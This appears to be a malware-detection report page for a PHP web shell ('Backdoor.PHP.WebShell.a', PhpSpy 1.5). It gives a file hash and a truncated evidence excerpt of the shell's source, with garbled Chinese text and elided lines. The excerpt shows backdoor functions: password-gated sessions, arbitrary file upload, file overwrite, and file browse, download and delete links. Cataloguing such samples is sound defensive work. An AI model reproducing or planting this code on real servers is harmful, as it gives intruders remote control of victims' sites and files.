Backdoor.PHP.WebShell.a
Web ShellWeb Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, PHPSPY.php
SHA-256f6cd35d36c440c9922e725554ef52c7acbaf44a3cc1f8d6804eead0c96083b4b
MaleculeTh
Evidence
1<?php
2/*
3+--------------------------------------------------------------------------+
4| PhpSpy Version:1.5 |
5| Codz by Angel |
6| (c) 2004 Security Angel Team |
7| http://www.4ngel.net |
8| ======================================================================== |
9| Team: http://www.4ngel.net |
10| http://www.bugkidz.org …
46:54… =*/
47if($admin['check']=="1") {
48 if($admin['checkmode']=="1") {
49 /*------- session ��֤ -------*/
50 session_start();
51 if ($_GET['action'] == "logout") {
52 session_destroy();
53 echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
54 echo "<span style=\"font-size: 12px; font-family: Verdana\">ע���ɹ�......<p><a href=\"".$_SERVER['PHP_SELF']."\">������Զ��˳��������˳��������>>></a></span>";
55 exit;
56 }
57 if ($_POST['action'] == "login") {
58 $adminpass=trim($_POST['adminpass']);
59 if ($adminpass==$admin['pass']) {
60 $_SESSION['adminpass'] = $admin['pass'];
61 echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
62 echo "<span sty …
⋯6 lines
268// �ϴ��ļ�
269elseif($_POST['action'] == "uploadfile") {
270 echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadmyfile']['name']."") ? "�ϴ��ɹ�!" : "�ϴ�ʧ��!";
271}
272
273// �༭�ļ�
274elseif($_POST['action'] == "doeditfile") {
275 $filename="$dir/$editfilename";
276 @$fp=fopen("$filename","w");
277 echo $msg=@fwrite($fp,$_POST['filecontent']) ? "д���ļ��ɹ�!" : "д��ʧ��!";
278 @fclose($fp);
279}
⋯6 lines
⋯4 lines
320/*===================== ִ�в��� ���� =====================*/
321
322if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
323?>
324<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
⋯4 lines
376:31… nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
377 echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlencode($dir)."/".urlencode($file)."\">����</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">�༭</a> | <a href=\"?dir=".urlencode($dir)."&delfile=".urlencode($dir)."/".urlencode($file)."\">ɾ��</a></td>\n";
378 echo "</tr …